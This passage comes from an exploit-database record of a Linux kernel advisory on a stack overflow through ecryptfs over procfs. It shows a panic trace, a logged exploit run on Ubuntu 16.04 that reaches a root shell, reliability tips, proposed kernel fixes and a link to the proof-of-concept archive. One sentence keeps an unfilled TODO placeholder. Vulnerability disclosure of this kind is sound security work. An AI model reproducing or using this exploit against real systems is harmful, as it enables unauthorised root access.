sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n \r\nexample run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n \r\n```\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\n[email\u00a0protected]:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n \r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n \r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n \r\nRegarding the fix, I think the following would be reasonable:\r\n \r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. (For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n \r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n \r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n \r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n \r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n \r\n \r\nNotes regarding the exploit:\r\n \r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n \r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n \r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25603"}]}
